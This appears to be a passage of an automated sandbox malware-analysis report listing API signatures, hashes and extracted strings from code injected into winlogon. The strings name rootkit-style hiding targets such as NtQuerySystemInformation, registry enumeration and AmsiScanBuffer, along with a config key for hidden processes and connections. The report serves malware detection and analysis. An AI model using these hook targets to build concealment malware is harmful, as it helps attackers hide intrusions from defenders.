                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: 176bc6c17da58cb777e97b847668772cea4fa243f14036d6c43020da7c5fc00a
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: C181E733B44788C5FB22DB21A550BDE7791FB447D8F888119AEA907B95DA3BC04387C2
                                                  APIs
                                                    • Part of subcall function 000001CA7D1ED220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D1EC987), ref: 000001CA7D1ED275
                                                    • Part of subcall function 000001CA7D1F0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D1F0EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000001CA7D1EDB99
                                                    • Part of subcall function 000001CA7D1ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2B6
                                                    • Part of subcall function 000001CA7D1ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2C0
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: 5205a7403cca9f1548dad89f04e5f688a0c075462e664ab97e36f28573c5fae2
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: 5A81F733B4478485FB22DB22E440BDEB791FB85B99F8C4125AE99077D5DE3AC1418743
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                  • Instruction ID: ca34dd41252b53d4a5cff9c5e57dc41cb2ffb1eb775b14f4f42dfe15e54293e6
                                                  • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                  • Instruction Fuzzy Hash: 541156B3A987D88BF75A9F6994517993790BB0438CFC48069D44986A94C73EC4D04F52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: fb15fa20126c4c6dafad04b3a9e0ce3b22ed315104faccb0dcb3aec83ba8768e
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 7371F837B50B5889FB129F26E850A9A33A4FF88B8DF801112DD4D57B68DE26C446C3D2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 2c83494e5a43262cfe800e831b7ec8651a9dabb613aca94f4580080f8d60cd14
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: CD711737B50B1985FB229F21E850AD833A4FF88B8CF819115ED4D47A28DE3AC546C3C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 68f115bde263472201ca07a53b25cff465ad2114566305ba7983a19ab3ffb222
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: FA516176E90B4EA5FB039B64E840EE53361FF8434DFC14512980926675AE7AC25BC3E3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: c27b5b2766e8a714269c9b7251a9534395d3fbc0594a058b2d3d4c984f6c3e2e
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 47517A72A90B0EA5FB039B68E842ED83324BF4475CFC18916A40902575DE7BD25BC3E7
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 7a9e4dd526ab2a344e9bcf59a507826a2bcd43945c5cf18051587018948a7a67
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 34513E33A50B889AE716CF62E4447AB77A1FBC8F99F844124DE4907758DF3DC04A8782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 10435c65013aa49502dc7abc10a9fb8f475a20879a614cbceb8abb604b999947
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: E5516033A50B8896F722CF62E44979A77A1FB88F98F858124DE4907718DF3DD046C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: c1dc221c099710ed114a4203ff786129722ca6648603eb70c6731709578373a2
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 7151C073A45B8886F721CF62E41879A77A1FB88F89F844124DE4A03758DF3DC145C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 35e59fce39fc26d4e588c545ceda4915201235a0509f46c42b5d2ee77a2c5ca4
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 97519C33B4171851FA569B56A800BE632A0BF88BB9F9807259E39173D4DF3AD40686C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 841100cd2b18d10c7530346504741f059c760433718e5c958d51dca8c66ea59f
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 79518F33B4170851FA169B56A800BE57250BF48BB8FD88729AE3D073D4DF3AD54686C7
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 43c5e0d34ebc6dccf3a439a469952983112bd81c68c9bea665965f379fc87005
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: A431A033E44B4896F722CF12E804B9AB3A0FBC8B9AF8505259E4957624DF39C45787C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 752b222f9f1cd9264d68c2c53bbe3c21249311e990f53d32d649b7497d1e9cf2
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 1A31E933E44B5896F722CF12A404B99B391FB88B98FC48528AD4843624DF3AD44383C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 5256ce4443abd153758bcd99e98d7bf0abd56920327f9ba419e77a24a63d0f90
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: C231C433E40B4996F722CF12E804B99B3A0FB88FCAF840614AE4943665DF39C555C382
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 5c16f09041be8b645f9990b675969fbfe91f0a43291d9b19f9330004a6e2f389
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 1C31A233A44B4986F712DF22A444B9A73A0FBC8F99F844024DE4A57724DE39D446C3C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 01238701deea32749901f043c41a85233535f38141b80a811341c7053083115b
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 9D31B433A44B4996F712DF12A444B9973A1BF88F98F858129DE4A43724DF3AE44782C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 8eab24d6d6144954bd2ca5cd0d15ee39b50dab67e5137aa515f9043b1a9d6d94
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 07318433A50B4986F712DF12E854B9973E1BF84F9AF8440259E4A43724DF39D542C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: e25051ce7f45a5f54960e9841c87e8732a799f56ae8f5b22f7c45591229d7051
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: CCD1CE33A447888AFB62CF2495407DD37A4FB4979DF901105EA8967B99CB35C482C7C3
                                                  APIs
                                                  Strings
